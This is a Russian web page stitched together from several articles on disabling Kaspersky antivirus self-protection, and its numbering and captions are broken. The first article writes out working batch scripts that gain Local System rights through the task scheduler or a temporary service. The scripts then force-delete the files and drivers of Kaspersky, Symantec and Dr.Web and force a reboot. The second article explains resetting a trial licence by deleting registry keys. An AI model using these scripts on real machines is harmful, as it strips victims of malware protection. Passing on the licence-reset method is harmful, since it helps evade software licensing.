Действие с ресурсами программы заблокировано самозащитой kaspersky как отключить

Обновлено: 06.07.2024

Сегодня мы поговорим о другом спорном моменте антивирусов — самозащите. Некоторые вендоры очень серьёзно относятся к этому моменту, и их продукты выстаивают даже в сложных комплексных случаях активного заражения, эффективно снимая вирусные перехваты, устанавливаясь в систему и даже в последующем удаляя уже изрядно прописавшихся зловредов. Другие считают, что активное заражение — это битва с ветряными мельницами, не приводящая ни к чему путному, а потому — LiveCD, а в ряде случаев и format c:

Отдадим должное обоим оппонентам: безусловно, если есть возможность победить вирусное противостояние — это хорошо. Если только это не приводит к бсодам и загрузке системы на пару-тройку дней. И абсолютно очевидно, что при серьёзном и комплексном заражении зачастую невозможно пробиться через активную массу перехватов, вредоносных процессов на уровне ядра и прочего — а потому часто действительно разумнее провести лечение неактивной системы (с LiveCD или сканируя винчестер на незаражённой машине), ну а в случае разношёрстной файловой инфекции — и задуматься о полной переустановке ОС.

Но не будем предаваться спорам — оставим это для следующей статьи :) Поговорим о простом: о самозащите системы даже на заведомо незаражённой системе. И примем априори:

1) имеется комплексный продукт антивирус+хипс+файервол;
2) система была незаражена, но каким-то образом проник вредоносный код;
3) вредоносный код имеет своим намерением удалить антивирус или повредить его настолько, чтобы обеспечить полную неработоспособность.

Вариант действий будет самым простым — попытка удаления жизненно важных файлов антивируса с правами Local System. Идея такого подхода принадлежит моему хорошему другу Алексею Баранову, который сообщил о ней в закрытых кругах некоторое время назад. Время прошло, будем считать, что вендоры подтянулись — проверим это.

На Windows-системах, работая под администратором (а это, наверное, 80% всех систем) получить права Local System достаточно просто. В голову сразу приходит два способа, хорошо описанные в сети.

Способ 1. Использование планировщика.
По умолчанию, на всех Windows-системах работает служба планировщика задач. Эта служба запускает задачи с искомыми правами Local System. Тогда очень просто добавить задание как-то:
at 11:05 c:\killer.bat
и kill.bat запустится с правами Local System.

Преимущества очевидны: всё просто и ясно. Недостаток: пользователь может заметить странную новую задачу в планировщике, да и просто в целях безопасности отключить эту службу.

Способ 1. Создание службы.
Суть метода заключается в создании службы, её запуске и удалении. При этом всё реализуется в три строчки:
sc create CmdAsSystem type= own type= interact binPath= "cmd /c start /low /b cmd /c (c:\killer.bat)"
net start CmdAsSystem
sc delete CmdAsSystem

При этом мало того, что killer.bat запустится с приоритетом IDLE, он ещё и будет запущен от имени Local System.
Метод незаметен, никак не проявляет себя.

На момент публикования статьи KIS 2010 оба метода пропускал на уровне хипса, даже не запрашивая никаких разрешений.

Ну а теперь перейдём к самому killer.bat (в нашем случае он расположен в корне на диске С, но понятно, что закинуть его можно куда угодно).

Суть этого файла проста: удаляем всё, что принадлежит антивирусу. Так, для Касперского 2010 это будет:
net stop srservice
erase /F /S /Q "C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 2010"
erase /F /S /Q "%windir%\system32\drivers\kl1.sys"
erase /F /S /Q "%windir%\system32\drivers\klif.sys"
erase /F /S /Q "%windir%\system32\drivers\klbg.sys"
erase /F /S /Q "%windir%\system32\drivers\klim5.sys"
erase /F /S /Q "%windir%\system32\drivers\klmd.sys"
erase /F /S /Q "%windir%\system32\drivers\klmouflt.sys"
shutdown -r -f -c "Bye-Bye. "

Для Symantec что-то типа (кто знает точнее — поправьте, сам-то я на Касперском):
net stop srservice
erase /F /S /Q "C:\Program Files\Symantec"
erase /F /S /Q "C:\Program Files\Norton Internet Security"
shutdown -r -f -c "Bye-Bye. "

Для Доктора Веба:
net stop srservice
erase /F /S /Q "C:\Program Files\DrWeb"
erase /F /S /Q "%windir%\system32\drivers\dwprot.sys"
erase /F /S /Q "%windir%\system32\drivers\drwebaf.sys"
erase /F /S /Q "%windir%\system32\drivers\DrWebPF.sys"
erase /F /S /Q "%windir%\system32\drivers\spiderg3.sys"
shutdown -r -f -c "Bye-Bye. "

Ну и так далее. В первой строчке идёт останов службы восстановления Windows — так, на всякий случай :)

Понятно, что аналогичный скрипт можно прописать для всех антивирусов — суть изменять пути к жизненно важным файлам.

Итого — что же мы имеем?

1. KIS 2010 получил такой урон, что был убит, и система осталась без защиты. KIS 2011 лишён этой половой слабости — но он же всё ещё бета…
2. NIS потерял несколько файлов, но работоспособность не нарушилась, файлы впоследствии были скачаны и восстановлены при обновлении из Интернет.
3. DrWeb вообще не пострадал, что и ожидалось, принимая во внимание особый упор разработчика на противостояние инфекции. Но не забываем, что для Веба есть SpiDie…

При этом хипсы указанных продуктов спокойно пропустили оба варианта манипуляций (КИС проверил лично).

ВЫВОДЫ
К сожалению, приходится констатировать факт, что некоторые из существующих антивирусных решений имеют ряд уязвимостей, которые могут быть использованы для повреждения защиты и фактически удалению антивируса с компьютера.

Предлагается в комментариях дополнить наблюдения и исследования по другим антивирусным продуктам (желательно с хипс, чтобы оценить и уровень блокировки действий по получению прав Local System). Думаю, что описанные манипуляции понятны и могут быть легко воспроизведены на виртуальных машинах энтузиастов.

Самозащита касперского

Как отключить самозащиту касперского

При нормальных условия Самозащита касперского отключается в меню Настройки → Дополнительно → Самозащита. Чтобы попасть в настройки необходимо в левом нижнем углу главного окна программы нажать на значок шестеренки.

kasperskiy disable self defense 002

Затем нажать Самозащита, снять флажок с надписи Включить самозащиту.

Касперский самозащита не активна

По истечении срока действия лицензии на использование касперского его работа приостанавливается, а большинство функций блокируются. В числе таких функций и Самозащита. Для восстановления работы компонентов защиты необходимо активировать Касперского по новой лицензии либо воспользоваться следующим вариантом решения проблемы.

1. Удалить Касперского с помощью утилиты удаления продуктов Лаборатории Касперского KAVRemover. Запустите утилиту, согласитесь с условиями лицензии. Выберите версию Касперского, которую нужно удалить, введите код капчи в соответствующее поле и нажмите Удалить.

kasperskiy disable self defense 003

kasperskiy disable self defense 004

3. Далее находим в реестре папку SPC, расположена по адресу:

kasperskiy disable self defense 005

4. Перезагружайте компьютер.

kasperskiy disable self defense 006

5. После запуска системы установите антивирус. Если у вас отсутствует файл активации, можно воспользоваться 30-дневной версией продукта. После активации все компоненты станут доступными.

Если Вы читаете данную статью, то наверняка задаете себе вопрос на тему как отключить самозащиту Касперского, если у Вас закончился срок лицензии и пункт меню самозащиты не активный, т.е. в нем ничего нельзя изменить. Данная статья поможет Вам отключить самозащиту, чтобы сделать сброс пробной версии лицензии Касперского и получить новый ключ.

Как отключить самозащиту, если нет лицензии

Для начала стоит сказать что существует два способа это сделать, один способ с удалением антивируса Касперского, а второй с загрузкой Windows в безопасном режиме. По сути оба метода в итоге дадут один и тот же результат. Начну я рассказывать с более доступного для простых пользователей метода через удаление программы.

1. Для начала нам понадобится скачать с официального сайта программу для удаления программы, называется она KAVRemover и скачать ее можно с официального сайта по ЭТОЙ ССЫЛКЕ.

2. Запускаем данную программу и соглашаемся с лицензионным соглашением.

Далее вводим в поле буквы, которые находятся в верхней части окна программы и нажимаем "Удалить".

После удаления Касперского нажимаем ОК и перезагружаем компьютер.

3. Далее запускаем редактор реестра через командную строку. Вызвать командную строку можно нажатием клавиш на клавиатуре Win + R.

В появившейся строке вводим команду regedit и нажимаем ОК.

Перед нами редактор реестра Windows. Теперь тут нужно удалить некоторые ключи (папки). Они находятся по адресу:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\SPC

Т.е. пользоваться как проводником, а удалить нужно по указанным выше адресам "папки" KasperskyLab и SPC, для этого нужно будет кликнуть по ним правой кнопкой мыши и выбрать пункт "Удалить".

4. После тот как Вы справились с удалением данных ключей, мы закрываем редактор реестра и теперь скачиваем нужный продукт Касперского с официального сайта Kaspersky Total Security или Kaspersky Internet Security , устанавливаем скачанный антивирус Касперского и запускаем его. После чего мы видим что программа просит ввести лицензионный ключ или получить пробную версию, при этом вкладка самозащита снова стала активной и ее можно выключать.

Второй способ отключения самозащиты, если нет лицензии

Он заключается в том, что нужно перезагрузить компьютер в безопасный режим уже в безопасном режиме проделать те же самые операции начиная с пункта 3 данной инструкции. Т.е. не нужно будет удалять Касперского перед тем как лезть в реестр. Т.е. запустились в безопасном режиме, удалили в реестре те же самые ключи и перезагрузились в обычном режиме, после чего получаем доступ к заблокированной самозащите.

В видео чуть ниже наглядно показан процесс отключения заблокированной самозащиты, и можно визуально оценить данные манипуляции, на самом деле все очень просто.

Понравилось видео? Подписывайся на канал Сергей Минеев, будет много новых интересных видео.

антивирус Касперского

У многих пользователей возникает необходимость отключить антивирус Касперского на время. Поводов для реализации этой процедуры может быть великое множество: ложные срабатывания, установка пиратского ПО и игр, программные конфликты, запуск другой антивирусной программы и т.д.

Однако не все знают, как корректно отключить Касперского на время.

В этой статье мы подробно поговорим о возможных способах отключения данной антивирусной программы.

Временная деактивация

Чтобы временно отключить антивирус:

1. Наведите курсор на иконку Касперского в трее (правая часть панели задач).

трей

2. Клацните правую кнопку мышки.

меню

3. В контекстно меню клацните пункт «Приостановить защиту… ».

4. Выберите режим приостановки:

выбор режима приостановки

«… на указанное время» — отключить Касперского на заданный в ниспадающем списке период времени. Щёлкните в первом пункте надпись «1 минуту» и выберите необходимое значение (3 минуты, 5 минут …. 3 часа, 5 часов).

период отключения

«… до перезапуска программы» — антивирус активируется только после перезапуска;

«приостановить» — деактивация на неопределённый период: Касперский будет отключен до тех пор, пока пользователь снова его не включит.

5. После выбора режима кликните кнопку «Приостановить защиту».

настройка приостановки

6. Подтвердите действие: в окне «Внимание!» клацните «Продолжить».

подтверждение

Примечание. В запросе подтверждения можно задать отключение повтора запроса в последующие 30 минут. Для этого нужно кликом мышки установить «птичку» в окошке надстройки.

статус деактивации

Другие способы отключения

Можно использовать и другие варианты деактивации антивирусной программы Касперский.

1. Кликните по иконке программы в трее. В меню нажмите «Настройка».

2. На вкладке «Общие», в графе «Защита», кликом мышки измените положение ползунка на «Выкл.».

отключение защиты

Внимание! Здесь же, на вкладке «Общие», можно отключить автоматический запуск антивируса при включении компьютера.

функция самозащиты

Ещё можно полностью выгрузить защитное ПО из памяти — закрыть программу.

1. Откройте меню в трее и выберите «Выход».

выход из программы

2. Подтвердите закрытие приложения: в панели запроса щёлкните «Продолжить».

подтверждение выхода

После активации выхода иконка из трэя исчезнет. Чтобы запустить снова антивирус, нужно воспользоваться его директорией в меню «Пуск».

ионки в трее

Отключение самозащиты

Если нужно отключить самозащиту Касперского — специальный программный механизм, предотвращающий модификации элементов антивируса, — выполните эту инструкцию:

1. Перейдите в настройки программы и кликните вкладку «Дополнительно».

самозащита

2. В списке справа выберите «Самозащита».

3. Щелчком мыши уберите «галочку» в строке «Включить самозащиту».

4. Подтвердите запрос: нажмите «Продолжить».

Будьте внимательны, отключая антивирус Касперского! В период его деактивации ваш ПК не имеет защиты и может быть подвержен всевозможным вирусным атакам. После выполнения необходимых процедур обязательно снова активируйте защитное ПО. Если возникает постоянная необходимость отключать антивирус при запуске какого-либо определённого приложения или загрузке конкретного веб-сайта, целесообразней добавить их в исключения и не прибегать к временной деактивации.

Читайте также: